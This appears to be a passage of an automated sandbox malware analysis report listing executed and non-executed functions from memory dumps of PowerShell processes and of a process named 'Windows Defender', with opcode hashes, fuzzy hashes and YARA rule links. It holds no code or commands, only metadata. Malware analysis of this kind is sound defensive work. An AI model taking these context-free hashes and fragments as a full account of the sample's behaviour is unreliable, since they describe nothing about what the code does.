                                      Function 00007FFD34688995 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2358490284.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34680000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: L_^$L_^$L_^$L_^
                                      • API String ID: 0-2357752022
                                      • Opcode ID: c3d8260613786ce9b6d877375d0233621ddf71c5e34efc806e0f4363ef8307b8
                                      • Instruction ID: 4a01e0560a2d2b89ccea12f3124e2c4a3892c68e5be2be88a0c2c3e971318c0d
                                      • Opcode Fuzzy Hash: c3d8260613786ce9b6d877375d0233621ddf71c5e34efc806e0f4363ef8307b8
                                      • Instruction Fuzzy Hash: 6541B463A0E6D25FE3578B2988A50D97FA1EF53354B0911F7C288CF1D3EA2D540A9352
                                      Function 00007FFD34688BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2358490284.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34680000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: L_^4$L_^7$L_^F$L_^J
                                      • API String ID: 0-3225005683
                                      • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                      • Instruction ID: 3f7ac82a682a578a4f261a0f346ec01a207f207bf7c156ecb7e514b89dd2c68f
                                      • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                      • Instruction Fuzzy Hash: DD21D1B77086255ED2127BFDB8155EF3744CFE427934552B2D2989B053EE14608A8EE0

                                      Executed Functions

                                      Function 00007FFD347639D1 Relevance: 2.9, Strings: 1, Instructions: 1605COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2460826375.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34760000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I_H
                                      • API String ID: 0-288374528
                                      • Opcode ID: ea984adad6ba70605e852d80b04025602c861ba2872652588153e035d8e6afee
                                      • Instruction ID: a505a2845561daa701973d48666f8625ff9b924aea49f52859fabaade8dcce5e
                                      • Opcode Fuzzy Hash: ea984adad6ba70605e852d80b04025602c861ba2872652588153e035d8e6afee
                                      • Instruction Fuzzy Hash: 4AA21772B0EB854FE7A6962858A51A47BE2EF97220B0901FFD18DC71D3DD1CAC06D391
                                      Function 00007FFD34699750 Relevance: .2, Instructions: 154COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2459868375.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34690000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ceb6051ceb4f01d174c9007ab13048344d86be0dbc0a104dbf3a53dd978f94dc
                                      • Instruction ID: 69f543ef5d1b2ad6bba474c4eef51a7a9628f14edfaab8b2b3162f920338a01c
                                      • Opcode Fuzzy Hash: ceb6051ceb4f01d174c9007ab13048344d86be0dbc0a104dbf3a53dd978f94dc
                                      • Instruction Fuzzy Hash: DC414C71A0CA884FD709DF1C9C1A6B97FE1FB66311F04416FD489D3293DE64A819CB82
                                      Function 00007FFD3457EE20 Relevance: .1, Instructions: 129COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2458838682.00007FFD3457D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3457D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd3457d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 82647128350aec57e82a5d2e3b4dd8b30d428bf16a2bf6f291fb9075cce498e8
                                      • Instruction ID: 79f673c7767925385520748d67c43645af9c661f6b27f5c3ae0d556775664940
                                      • Opcode Fuzzy Hash: 82647128350aec57e82a5d2e3b4dd8b30d428bf16a2bf6f291fb9075cce498e8
                                      • Instruction Fuzzy Hash: 5D41157180DBC45FE7578B289C959523FF0EF53320B1545EFD488CB1A3D629A846C7A2
                                      Function 00007FFD3469A4BC Relevance: .1, Instructions: 100COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2459868375.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34690000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 40a9a06e296b115dc2f40269035001e0c4ab41db64f4eb0511eee85c423ba4b1
                                      • Instruction ID: 8d1acd20fe045f9ea6ae11b165fe9b234b0f35c11a0e291d72e15d940fab6367
                                      • Opcode Fuzzy Hash: 40a9a06e296b115dc2f40269035001e0c4ab41db64f4eb0511eee85c423ba4b1
                                      • Instruction Fuzzy Hash: FA21F631A0C74C4FEB59DF9C984A7E97BF0EB66321F00426BD049C3162DA74A80ACB91
                                      Function 00007FFD347640BF Relevance: .1, Instructions: 98COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2460826375.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34760000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ca7e7a250331dde7489d3290811c8d08968e5f7e03a12a7ea31b70473d86ad21
                                      • Instruction ID: a35eac5f5cdb907554dad549f5bfee655521a57ac2e178aa54f0e1c4c8eaadb1
                                      • Opcode Fuzzy Hash: ca7e7a250331dde7489d3290811c8d08968e5f7e03a12a7ea31b70473d86ad21
                                      • Instruction Fuzzy Hash: 272105A3B0DA9A8FE7A9DA1844E017436D3EF66230B5900BAD24DC71D3DD2CFC049789
                                      Function 00007FFD347643BC Relevance: .1, Instructions: 63COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2460826375.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34760000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c89945b120241d78df99a5627d1d95d3ac15ef869bc68ba248472a44003c6d74
                                      • Instruction ID: fad621cf3a390200784aeb8b0c9625ea0186af50b3e3c5be714991194d39c5df
                                      • Opcode Fuzzy Hash: c89945b120241d78df99a5627d1d95d3ac15ef869bc68ba248472a44003c6d74
                                      • Instruction Fuzzy Hash: F51136B2B0E6458FE7A0D71C84E51B47BD2EF4623474800BAD55DD7093D91CBC0093C4
                                      Function 00007FFD3476681E Relevance: .1, Instructions: 60COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2460826375.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34760000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c4eba8b98be6225357d39852b85429f04a6fd23640f6de2b855f807d8ff3284a
                                      • Instruction ID: 659fbae847c576cf1bcfe8801f246be97fbfb6370fe63e2d375b5bb1c80b4b32
                                      • Opcode Fuzzy Hash: c4eba8b98be6225357d39852b85429f04a6fd23640f6de2b855f807d8ff3284a
                                      • Instruction Fuzzy Hash: ED117A72F0D6898FE761DAA880E016877D2EF16320F4440BFC10CD7093C92CA805C380
                                      Function 00007FFD3469A0FB Relevance: .1, Instructions: 58COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2459868375.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34690000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e874459e22fcecc70b45835faba009de7861df05a7d478259b4cdc69c8ec025f
                                      • Instruction ID: 9a6b4cb693f263d7d046de9899448ae7fdfcc4fc9e5626661e7505a1c08a9a2f
                                      • Opcode Fuzzy Hash: e874459e22fcecc70b45835faba009de7861df05a7d478259b4cdc69c8ec025f
                                      • Instruction Fuzzy Hash: F211A5BA94D7D94FDB529F286CA50D57FE0EF23210B0511BBC588CB062EE6D580AD742
                                      Function 00007FFD346933B5 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2459868375.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34690000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                      • Instruction ID: 66e339b9c219ae05c0f4a9cc314582de7c043b64f66fa0b2c63f0f34819a108e
                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                      • Instruction Fuzzy Hash: 5F01677125CB0C4FDB44EF0CE451AA5B7E0FB99364F10056DE58AC3651DA36E892CB45

                                      Non-executed Functions

                                      Function 00007FFD34698BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2459868375.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34690000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
                                      • API String ID: 0-2350917820
                                      • Opcode ID: bc87f67d5ee211d0230bc6426bec13470efd9727eb4ff8c2f699d3309f46b341
                                      • Instruction ID: 4ae33b8a9e62b2815184ff7d28bf263346050f7a009a295ce7fc458e93cd07ca
                                      • Opcode Fuzzy Hash: bc87f67d5ee211d0230bc6426bec13470efd9727eb4ff8c2f699d3309f46b341
                                      • Instruction Fuzzy Hash: 9C2126B3B486155ACA1237FCF8915EA7794DFA437D34502F3E058EF013DD18A48B8A80

                                      Executed Functions

                                      Function 00007FFD347339D1 Relevance: 2.8, Strings: 1, Instructions: 1591COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2626126742.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ffd34730000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: L_H
                                      • API String ID: 0-402390507
                                      • Opcode ID: 1028abf606b3887bd0097a2c4a874d8a21095cb0f2551355665dae17c9e8d7c1
                                      • Instruction ID: cfeefcf0066d2aa3c0fe1207071882ab4b021caf5c97479236047133a0bd210a
                                      • Opcode Fuzzy Hash: 1028abf606b3887bd0097a2c4a874d8a21095cb0f2551355665dae17c9e8d7c1
                                      • Instruction Fuzzy Hash: 49A217A2B0DB894FE76A962858B51A43BE1EF97210B1901FBD18DC7193D91CBC06D3D2
                                      Function 00007FFD34669F52 Relevance: .2, Instructions: 184COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2624887353.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ffd34660000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 39515a926632b9f5026c9b713b4089d6f72de92420d7dfa0b22c784234a2e5a4
                                      • Instruction ID: 30dd1a50df61002fd53eb6d63c38d425196b6e3aaff3ffd3f0525e5e65e3e923
                                      • Opcode Fuzzy Hash: 39515a926632b9f5026c9b713b4089d6f72de92420d7dfa0b22c784234a2e5a4
                                      • Instruction Fuzzy Hash: 2A510837A086A14FD712AF6CDCB50E67BA0EF53339B0901F6CA98DF053EE1864558B85
                                      Function 00007FFD34669738 Relevance: .1, Instructions: 142COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2624887353.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ffd34660000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7153f690ed97d4537d0674b2386238d8a321644af53e7b94f4fa29037da8bea6
                                      • Instruction ID: 9f4a11909e201d2985946d1ebf9f9a4242e389d79dc1408a9a98f535754e37b4
                                      • Opcode Fuzzy Hash: 7153f690ed97d4537d0674b2386238d8a321644af53e7b94f4fa29037da8bea6
                                      • Instruction Fuzzy Hash: EC412B71A0CE485FDB589F5C9C5A6F8BBE0FB95320F14412FE449D3292DA24B816CBC2
                                      Function 00007FFD3454EB80 Relevance: .1, Instructions: 126COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2623663835.00007FFD3454D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3454D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ffd3454d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6c931d44f0c50ea089465246768e252b8f4b370f6abf65ecb0205c2f60ad7d5a
                                      • Instruction ID: 2d42515d22bfb815ff26ed5b32d2c672cf17eb7262e69f0d2daae5930f5940a4
                                      • Opcode Fuzzy Hash: 6c931d44f0c50ea089465246768e252b8f4b370f6abf65ecb0205c2f60ad7d5a
                                      • Instruction Fuzzy Hash: 5041267180EBC44FE7578B3898919923FF0EF53324B1505EFD089CB2A3D629A806C792
                                      Function 00007FFD3466A47C Relevance: .1, Instructions: 100COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2624887353.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ffd34660000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a37c4bc0c1bae6d6ccf2b7d5fb60732a39e5f9cf6041671942e2798cfdad7ed3
                                      • Instruction ID: 39e4dc9eec96a5e10fb38b71b107d81f1a095837c2d1d2738cf6dce093482f04
                                      • Opcode Fuzzy Hash: a37c4bc0c1bae6d6ccf2b7d5fb60732a39e5f9cf6041671942e2798cfdad7ed3
                                      • Instruction Fuzzy Hash: 1121D83090C74C8FEB59DFAC9C8A7E97BF0EB9A321F04416BD049C3156DA74A45ACB91
                                      Function 00007FFD347340BF Relevance: .1, Instructions: 98COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2626126742.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ffd34730000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f80c47f90c77ca7f71878310c3a55f15b1f8fee11eec4a2617a67175c9c334dd
                                      • Instruction ID: 6cf4b0a7d7879fa52af55032872dcc3cba38836bc9f76a664ac03975228ca3a5
                                      • Opcode Fuzzy Hash: f80c47f90c77ca7f71878310c3a55f15b1f8fee11eec4a2617a67175c9c334dd
                                      • Instruction Fuzzy Hash: F821D4A3B0DE968FE7A99B1844F113476D2EF66210B6900BAD24DC71A3DD2CFC4493C1
                                      Function 00007FFD347343BC Relevance: .1, Instructions: 63COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2626126742.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ffd34730000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: be67b1fb8d1ff367ba1801a84fba4dcbcb44f6f6acf0a332ff6146d962d06edc
                                      • Instruction ID: 3a7f7c13a07c021193f31da83936b4d7cd5e46b836a2adb8252b81c8c0e860ba
                                      • Opcode Fuzzy Hash: be67b1fb8d1ff367ba1801a84fba4dcbcb44f6f6acf0a332ff6146d962d06edc
                                      • Instruction Fuzzy Hash: 021102B2B0E6898FE7A8DA1884F45B877D1EF46224B6900BAD25DC7193D92DFC1093C1
                                      Function 00007FFD3473681E Relevance: .1, Instructions: 60COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2626126742.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ffd34730000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 943147663f47a334521948211bee97546f5c0817a891e459c907f91b0ebaba83
                                      • Instruction ID: 50bfd79ec59efc5a111ed1e3617f555d399be25853106c8c70f801cd5ff54e8c
                                      • Opcode Fuzzy Hash: 943147663f47a334521948211bee97546f5c0817a891e459c907f91b0ebaba83
                                      • Instruction Fuzzy Hash: F1113AB2F0D6888FE7B5DA9844F55A877D1EF1A310F2440BFC24CC7193DA29A805C391
                                      Function 00007FFD346633B5 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2624887353.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ffd34660000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                      • Instruction ID: a87958a79b51de30136d2a5796adff37845468f6d091c294b1e8deaa73d43299
                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                      • Instruction Fuzzy Hash: 9501677121CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E892CB45

                                      Non-executed Functions

                                      Function 00007FFD34668995 Relevance: 5.1, Strings: 4, Instructions: 136COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2624887353.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ffd34660000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: N_^$N_^$N_^$N_^
                                      • API String ID: 0-3900292545
                                      • Opcode ID: 94a491a110cf06302f9e8159bb7269a656a5c3cb5112b6729cbdec443de6cd8d
                                      • Instruction ID: 34116cea6320fba02d4a339d2966c0595af2504b41422c0b15e062654e084399
                                      • Opcode Fuzzy Hash: 94a491a110cf06302f9e8159bb7269a656a5c3cb5112b6729cbdec443de6cd8d
                                      • Instruction Fuzzy Hash: A3419163E0E6D25FE3024B694CB50E57FA1EF53224B0E11F6C6C8DF093EA1C68069792
                                      Function 00007FFD34668BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2624887353.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ffd34660000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: N_^4$N_^7$N_^F$N_^J
                                      • API String ID: 0-3508309026
                                      • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                      • Instruction ID: be603aa38f986340cf5313dc8a8fb132244078021a9e01a130fd24d974cc3163
                                      • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                      • Instruction Fuzzy Hash: EF2104B7B082255ED3117BFCEC245EA3B44DFA423974502B2D298DB143ED14608A8AC2

                                      Executed Functions

                                      Function 00007FFD346916E9 Relevance: .7, Instructions: 703COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2925402597.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8bccace75c744822fec3b808fbe77592fae7031a1d884809a9b897bc04eebce5
                                      • Instruction ID: 48ca63234fb6845efb968b28c0146fd2a38fa5fbc1fa8955b0f463341be8b683
                                      • Opcode Fuzzy Hash: 8bccace75c744822fec3b808fbe77592fae7031a1d884809a9b897bc04eebce5
                                      • Instruction Fuzzy Hash: 1222C275B28A194FE7A8FB7884B93B977D2FF99300F540579E04EC3292DE68A8418741
                                      Function 00007FFD34690E5E Relevance: .3, Instructions: 283COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2925402597.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2638fc585e74ba809cc406800bf20a197b7b567f88a6688076e7927f9e8ec456
                                      • Instruction ID: ea4bfb9f7b4cb58945557a299b10e8b9e7b7b2a96ecd265f76b70b9be575d843
                                      • Opcode Fuzzy Hash: 2638fc585e74ba809cc406800bf20a197b7b567f88a6688076e7927f9e8ec456
                                      • Instruction Fuzzy Hash: 3D810512B4D7960EE366B7BCA4651FA3B95DFD6235B0840BBD0CCCA1A3DC0868478792
                                      Function 00007FFD346920C1 Relevance: .2, Instructions: 206COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2925402597.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: df6611b999fd1d8cadeb853bf6c48774579eb2b1eae79f46541730846e2955e0
                                      • Instruction ID: 65a9d6beb78e15671818cf49713227a85b48946f2710352a4131251cd04ee084
                                      • Opcode Fuzzy Hash: df6611b999fd1d8cadeb853bf6c48774579eb2b1eae79f46541730846e2955e0
                                      • Instruction Fuzzy Hash: CE51F010B1E6C50FE796ABB858B52B57FD5DF87229B0808FFE0CAC61A3DD581816C342
                                      Function 00007FFD346907CF Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2925402597.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;L_
                                      • API String ID: 0-2770409130
                                      • Opcode ID: 246492e49cb2170a8ae997482684667959c1e46628e6d17cb507c8009c12900a
                                      • Instruction ID: 3d01cc8faba00bbe5ba43d58f3a2b1159ac23d5ffdaedfc367483cba6973cdca
                                      • Opcode Fuzzy Hash: 246492e49cb2170a8ae997482684667959c1e46628e6d17cb507c8009c12900a
                                      • Instruction Fuzzy Hash: 2D31D539B69B4A4FD796EBA890B91E93FA1EF95204F8084B9D04DC7382DD786840CB41
                                      Function 00007FFD346912B8 Relevance: .5, Instructions: 489COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2925402597.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e8a769b5ed74093e55c85984491f7e12fa17c7f28a29df6c8d717cc26f84fc18
                                      • Instruction ID: 837f515824b25d94df5c8e6cb8832d78d5cf382c754aa4c0868b2703967dbe75
                                      • Opcode Fuzzy Hash: e8a769b5ed74093e55c85984491f7e12fa17c7f28a29df6c8d717cc26f84fc18
                                      • Instruction Fuzzy Hash: 4231D022F19A4A4FEB55EBA8C8A21ED7BB1EF96210F4401B7D049E3193DD686C02C380
                                      Function 00007FFD34690AFB Relevance: .2, Instructions: 209COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2925402597.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8b669ffdc18d6e5dbb964bdeb6d8baa5e1282304cbcd5645081208ca0c314ab6
                                      • Instruction ID: d10f3c75ffe355325e244160a4a02e3358265902482520e021d6ccd57df43b00
                                      • Opcode Fuzzy Hash: 8b669ffdc18d6e5dbb964bdeb6d8baa5e1282304cbcd5645081208ca0c314ab6
                                      • Instruction Fuzzy Hash: 2951FB36B1CA2A4BDB51BBECE4A11FE73A0FFA5326F54013AD108D7296CE396441C790
                                      Function 00007FFD34690B6F Relevance: .2, Instructions: 158COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2925402597.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 26ef48170a9b2777bf968316a6cecf722967c9503b0b8981b4db71dc32a76d75
                                      • Instruction ID: c715bd6eeb548109427126adeef7c3b03543eab37baef6e9b820f24c5377cbf7
                                      • Opcode Fuzzy Hash: 26ef48170a9b2777bf968316a6cecf722967c9503b0b8981b4db71dc32a76d75
                                      • Instruction Fuzzy Hash: 5741D636B18A1A8FDB44FBE8D8A56ED73E1FF95315F90413AD109D7282CE39A446C780
                                      Function 00007FFD34690638 Relevance: .1, Instructions: 134COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2925402597.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a892823f2e11332ef91bf09c3ee01b3b7351b9c4f03a1bb9d0d9fc78a8abdcb3
                                      • Instruction ID: e6c55fa03e5d79a2b2932ecc1345e258f747a6eac846dafe2f142d143a1f34e0
                                      • Opcode Fuzzy Hash: a892823f2e11332ef91bf09c3ee01b3b7351b9c4f03a1bb9d0d9fc78a8abdcb3
                                      • Instruction Fuzzy Hash: E5318721B1D9490FE798FB6C946A2B9B6C2EFD9315F4405BEE04EC32A7DD68AC418341
                                      Function 00007FFD346915DB Relevance: .1, Instructions: 87COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2925402597.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
